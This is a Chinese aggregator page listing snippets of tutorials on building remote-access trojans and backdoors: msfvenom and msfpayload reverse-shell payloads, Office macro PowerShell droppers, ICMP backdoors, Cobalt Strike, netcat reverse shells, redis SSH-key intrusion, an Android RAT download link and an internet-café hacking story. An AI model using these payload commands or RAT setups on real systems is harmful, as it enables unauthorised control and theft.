首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
kali生成的py远控源代码
2024-08-29
使用kali生成远控payload
kali linux中的metasploit框架是优秀的渗透框架之一,今天记载一下使用kali生成windows远控木马的过程 生成payload使用的工具是MSFVenom,我们输入msfvenom之后会显示出它的基本参数 在这里我们没有设置参数,所以第一行出现了一个错误 这里我们主要讲windows下payloads的生成和利用,在第五行里面我们看到已经给出了一个生成payload的例子,这个例子生成的就是windwos下的木马 即: Example: /usr/bin/msfvenom -
HackingTeam重磅炸弹: 估值超1000万美金带有军火交易性质的木马病毒以及远控源代码泄露
[简单介绍] 经常使用网名: 猪头三 出生日期: 1981.XX.XX 个人站点: http://www.x86asm.com QQ交流: 643439947 编程生涯: 2001年~至今[共14年] 职业生涯: 12年 开发语言: C/C++.80x86ASM.PHP.Perl.Objective-C.Object Pascal.C#.Python 开发工具: Visual Studio.Delphi.XCode.Eclipse 技能种类: 逆向 驱动 磁盘 文件 研发领域: Windows应
【原创】利用Office宏实现powershell payload远控
本文将演示使用Veil-Evasion生成远控所需要的payload以及监听器,然后使用MacroShop生成payload 相关的VBA代码,最后演示将VBA代码写入.doc文本文档的宏中. 环境:虚拟机_Kali 依赖:Veil-Evasion.MacroShop 0x00 安装Veil-Evasion.MacroShop (老鸟可绕过) 本例采用git 安装. 打开Veil-Evasion的github页面:https://github.com/Veil-Framewor
Python3实现ICMP远控后门(中)之“嗅探”黑科技
ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 在上两篇文章中,详细讲解了ICMP协议,同时实现了一个具备完整功能的ping工具,完整的代码发布在https://github.com/qiyeboy/LuLunZi/blob/master/NetWork/ping.py中.本次讲的是嗅探,为什么要讲嗅探呢?和ICMP后门有什么关系呢?本篇的干货有点多... 第一节 ICMP后门结构 设计的ICMP后门采用的是典型的C
Python3实现ICMP远控后门(下)之“Boss”出场
ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之"嗅探"黑科技 熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示. 在前几篇的基础上,本篇扩展的知识点为数据的加密和解密,以及shell的调用,并最终生成一个可用的ICMP后门.本篇总共分为五节,需要花费5分钟时
利用kage把msf变成可视化远控平台
项目下载https://github.com/WayzDev/Kage/releases 这里用kali系统演示 1,先下载kage: 2,右击给予执行权限 3,启动msf msfconsole -q -x 'load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msfuser Pass=msfpass' 注意:如果kage跟msf不在一个机器上,上面命令如果不带serverhost参数,则只容许127.0.0.1链接我们也那么可以通过 msf
python+msf 制作 windows远控
最近分析的一个远控,后发现是meterpreter rever http shell,文件是个打包的python(打包成exe),感谢wstone的指导~ 创建dll ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll python main.py import sys, os import shutil import time import ctyp
redis使用ssh密钥远控靶机
首先说明一下我们的实验目的,我们这个实验需要利用一种公有密码,将公有密钥写入要攻击的服务器的redis数据库,然后使用我们自己的私钥进行远控肉鸡的操作. 实验环境:centos7(靶机,版本无太大要求,重点是靶机需要开启22端口的ssh服务) kali(攻击方) (1)在centos7内安装redis数据库,并以root权限启动redis(安装步骤请参照我写的上一篇 https://www.cnblogs.com/cute-puli/p/10853300.html ) 看到饼状图代表redi
cobaltstrike进行局域网远控
用cobaltstrike进行局域网远控 cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端. 实验原理:用cobaltstrike生成木马,发送到目标主机上,双击运行后反向链接到cobaltstrike监听的端口,实现远程控制 本次实验的cobaltstrike安装在kali中 点开文件 3.按住shift,右击黑色区域,点击"在终端打开",sudo su,进入超级管理员权限 4.首先给文件
用nc+简单bat/vbs脚本+winrar制作迷你远控后门
前言 某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念. 我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接. 真正的远控还没实践过,所以决定写个小后门试一试. 1.NC.正向Shell.反向Shell介绍 1.1 什么是nc: nc是netcat的简写,就是一个简单.可靠的网络工具.当然因为某些奇怪原因,已经被各大杀毒轮番轰炸.原因就和下文所述有关. 1.2 nc的作用: (1)实现任意TCP/UDP端口的侦听,nc可以作为服务器端以TCP或UDP方式侦
2019-9-11:渗透测试,Kill远控软件,初接触
初步使用Kill远控软件,使win7靶机被远控 该文章仅供学习,利用方法来自网络文章,仅供参考 1,打开运行Kill,选择系统设置,设置监听端口,通讯密码,点击保存设置 2,点击服务生成,上线参数,设置服务端ip地址,端口设置为之前本地监听的端口,点击测试,提示“链接成功”就是设置正常 3,打开远控软件目录下的,hfs服务端软件 4,将左侧默认文件都移除掉,右键单击,选择 移除即可 5,在虚拟文件系统下的主页图标,右键单击,点击添加文件,将远控软件hfs服务文件夹下的consy21.dll
手机远控SpyNote教程+软件
链接:https://pan.baidu.com/s/1q0VVSxK0DCJk2VnOg5RgOA 提取码:1okp 生成一个小马界面.可以看到,和以往的远控一样,做好端口映射,定制图标,包名,版本号等等,还可以和别的apk文件捆绑, 点击imei,弹出一个对话框.点击[tool p] 即可. 然后等一段时间,电脑桌面上你会看见这个界面. 1.可以生成一个APK,绑定在被控手机的任何APP上2.可在电脑端控制手机,包括浏览.传输.删除文件等6.麦克风监听7.GPS定位8.APP管理
Python解决网吧收费系统,远控网吧电脑设备!
python破解网吧收费系统,远控网吧电脑设备! 很多人学习python,不知道从何学起.很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手.很多已经做案例的人,却不知道如何去学习更加高深的知识.那么针对这三类人,我给大家提供一个好的学习平台,免费领取视频教程,电子书籍,以及课程的源代码!QQ群:1097524789 我今天呢 , 我就没事跟着朋友喝酒喝酒啊.喝了很多啊.晚上到旁边的酒店开了一个房间,到了酒店才十点! 感觉没啥事情干的,那就去网吧走走看吧,看到是一个嘟嘟牛的,和
远程控制(远控Bin)
一.概念 控制端:运行在攻击者的电脑中,负责控制其他肉鸡: 被控制端:需要去生成,运行在肉鸡上,木马病毒 二.使用远控Bin工具实现内网远程控制 Step1:打开Kill.exe,点击系统设置,修改监听端口为9999,设置通讯密码: Step2:打开./Plugins/hfs2_3b287/hfs.exe,将虚拟文件目录中的东西全部移除: Step3:右键添加文件,将Consys21.dll添加进去:点击在浏览器中访问. Step4:将Consys21.dll的地址复制,打开kill.exe的服
基于gRPC编写golang简单C2远控
概述 构建一个简单的远控木马需要编写三个独立的部分:植入程序.服务端程序和管理程序. 植入程序是运行在目标机器上的远控木马的一部分.植入程序会定期轮询服务器以查找新的命令,然后将命令输出发回给服务器. 管理程序是运行在用户机器上的客户端,用于发出实际的命令. 服务端则负责与植入程序和客户端的交互,接收客户端的指令,并在植入程序请求时,将命令发送给植入程序,随后将植入程序发送来的结果传递给客户端. gRPC 这里通过gRPC构建所有的网络交互. 关于gRPC.Protobuf.protoc请参考h
Python3实现ICMP远控后门(上)
这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了. 大家可能对采用ICMP,DNS的木马不是很熟悉,其实这两种协议在木马通信上很流行,特点是比较隐蔽,不容易被封锁.HTTP协议主要是用在以大型网站作为C&C服务器的场景,例如之前就有使用twitter作为 C&C服务器. 本次就以ICMP协议进行分析,并使用Python开发出一个ICMP远控后门,在写这篇文章的之前,我感觉大家对ICMP协议肯定不会很
Python3实现ICMP远控后门(上)_补充篇
ICMP后门(上)补充篇 前言 在上一篇文章Python3实现ICMP远控后门(上)中,我简要讲解了ICMP协议,以及实现了一个简单的ping功能,在文章发表之后,后台很多朋友留言,说对校验和的计算不是很了解,实现的ping功能仅实现了发送,接收没有实现,一个完整ping如何实现等等.本来对于ICMP后门写三篇文章的,但是对大家的疑惑临时开辟了一个补充篇,对ICMP协议校验方式,以及实现一个完整功能的ping给大家进行详细的讲解. 第一节 ICMP协议校验和 对于校验和的计算,我对写校验和的代码
[jk]服务器远控卡及kvm切换器
远控卡的需求 经常我们有这么一个需求,那就是某一台器服务器突然宕机,不能启动,而机房却在外地.解决这个问题的方法有两种,一是联系机房人员,二是通过idrac卡远程连接.我们必须根据事情的轻重缓急,来选择解决办法,毕竟恢复服务正常运行是第一原则.如果这台服务器不是非得马上起来的话(已经做了高可用),我们又想查看具体的宕机原因,那我们就可以通过idrac卡远程连接过去.连接方法如下: 远控卡功能介绍 ,可以传文件,装系统,做电源管理,硬件监控(ipmi)等. 准备工作 1.能够远程访问的BMC地址(
python破解网吧收费系统,远控网吧电脑设备!
我今天呢 , 我就没事跟着朋友喝酒喝酒啊.喝了很多啊.晚上到旁边的酒店开了一个房间,到了酒店才十点! 感觉没啥事情干的,那就去网吧走走看把,看到是一个嘟嘟牛的,和上次是一样的.还是照常用MS17010 扫描一波.发现一台Xp 没啥用的,后面进去看了下,发现还真的没啥用的东西 那么就继续扫描呗,嘟嘟牛是那个 asp+mysql 架构那么就扫描一下mysql端口 上啊D吧 发现没有.那么就扫一下3308 发现竟然在3308 上去看看.尝试一下默认密码.我看看嘟嘟牛的版本 那么弄一个exp呗 数据
为GHOST远控添加ROOTKIT功能
原版的ghost远控似乎有一个SSDT HOOK功能的模块,当然已经没有什么用处了.这里在GHOST的基础上添加一些ROOTKIT功能.而且随着x64下主动防御技术的发展,这里不打算使用传统的HOOK技术. 主要的想法是 1.设置进程创建事件通知,检测安全软件进程启动 2.设置注册表修改事件通知,保护我的注册表项不被修改 3.设置关机回调,在关机检测自启动项是否存在 4.注册进程对象回调,检查任何对本进程对象的操作 5.枚举SSDT,检测是否存在HOOK,如果存在,远控程序自毁 6.枚举敏感的设
热门专题
win7ad域管理工具
第一个springboot 报错
echart面积折线图坐标轴颜色
html 时钟 clearRect
修改MySQL5.6data目录路径 启动报1067
ubuntu制作网盘
用扑克牌计算24点 (25 分)
欧几里得算法求最大公因子gcd(p,q)的算法
idea的注册服务器
redis om官网
循环字典写入excel
高德地图 获取 pois
red hat设置防火墙关闭端口不生效
C# 读取配置项加入数组
零起点学算法103——查找最大元素
idea spring引入CONTEXT约束
C 中readlink
postman如何设置query参数
script引入js文件 加参数
vivado 自定义 interface 主从